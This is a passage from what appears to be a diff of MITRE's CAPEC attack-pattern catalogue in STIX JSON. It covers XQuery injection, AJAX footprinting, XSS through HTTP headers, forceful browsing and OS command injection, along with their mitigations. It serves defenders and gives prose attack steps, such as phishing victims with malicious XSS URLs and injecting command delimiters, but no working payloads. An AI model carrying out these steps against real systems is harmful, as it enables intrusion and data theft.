    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use XML files to inject input.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

Exploit

  1. Information Disclosure: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.

    2. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it.

  2. Manipulate the data in the XML database: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.

    3. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The XQL must execute unvalidated data" + ], + "x_capec_skills_required": { + "Low": "Basic understanding of XQuery" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform input allowlist validation on all XML input", + "id": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5034c53d-3c8c-4bfa-991c-3bdf02939873", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "spec_version": "2.1", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", + "id": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c10ee2c-94e2-4608-adae-9eedeae55591", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "spec_version": "2.1", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.", + "external_references": [ + { + "external_id": "CAPEC-85", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/85.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Shreeraj Shah, Ajax fingerprinting for Web 2.0 Applications, Help Net Security", + "external_id": "REF-539", + "source_name": "reference_from_CAPEC", + "url": "https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf" + } + ], + "id": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "AJAX Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Send request to target webpage and analyze HTML: Using a browser or an automated tool, an adversary sends requests to a webpage and records the received HTML response. Adversaries then analyze the HTML to identify any known underlying JavaScript architectures. This can aid in mappiong publicly known vulnerabilities to the webpage and can also helpo the adversary guess application architecture and the inner workings of a system.

    2. Techniques
    Record all \"src\" values inside script tags. These JavaScript files are compared to lists of files for known architectures. If there is a large match between the \"src\" values and architecture files, then it can be assumed that particular architecture is being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The user must allow JavaScript to execute in their browser" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3d1586e2-3d5c-4ee5-9af8-6c3990a12afe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", + "external_references": [ + { + "external_id": "CAPEC-86", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-80", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + } + ], + "id": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Through HTTP Headers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n Utilize a remote style sheet set in the HTTP header for XSS attack. When the adversary is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote adversary. Like most XSS attacks, results vary depending on browser that is used [REF-97].\n ; REL=stylesheet\">\n ", + "\n Google's 404 redirection script was found vulnerable to this attack vector.\n Google's 404 file not found page read\n * Response headers: \"Content-Type: text/html; charset=[encoding]\".\n * Response body: \n If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]\n ", + "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the adversary can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.
    Look for HTML meta tags that could be injectable
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. [Probe identified potential entry points for XSS vulnerability]The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.\n The adversary tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response.\n

    2. Techniques
    Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter which is used in an HTTP header to include a malicious script tag. Because it is in the header it may bypass validation.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be a client that allows scripting communication from remote hosts." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an adversary can simply edit HTTP Headers that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--117080d2-a3f1-4d19-8903-672ec63ff81f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df64b21f-91ca-4495-9718-794582fa0ab8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43bfa851-97cf-48ba-8050-69a14ce4b820", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e5a1a01-0c47-4cc1-9ce2-6156b3d231b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72764d4-b17e-42fe-81ba-463f07deb30f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e7dfa2a-7e3f-483c-bd32-1110f0cbfb03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c80de0f3-14b1-4da8-ab8f-01d6e8887f58", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b4da2d-507c-490d-8270-6c9c321c6752", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

    2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

    2. Techniques
    Access unprotected functions and execute them.

  2. View unauthorized data: The attacker discovers and views unprotected sensitive data.

    3. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", + "id": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3b65115-d4f0-4a7d-a9d8-7c012f7e3787", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "spec_version": "2.1", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", + "id": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6172678d-c4c1-4700-9518-deec24ab23cc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "spec_version": "2.1", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", + "external_references": [ + { + "external_id": "CAPEC-88", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "OS Commanding", + "external_id": "31", + "source_name": "WASC", + "url": "http://projects.webappsec.org/OS-Commanding" + }, + { + "description": "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection, Secunia Advisories, 2005--09---20, Secunia", + "external_id": "REF-543", + "source_name": "reference_from_CAPEC", + "url": "http://secunia.com/advisories/16869/" + } + ], + "id": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "OS Command Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

    3. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application

    2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)

Exploit

  1. Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.

    2. Techniques
    The attacker executes a command that stores sensitive information into a location where they can retrieve it later (perhaps using a different command injection).
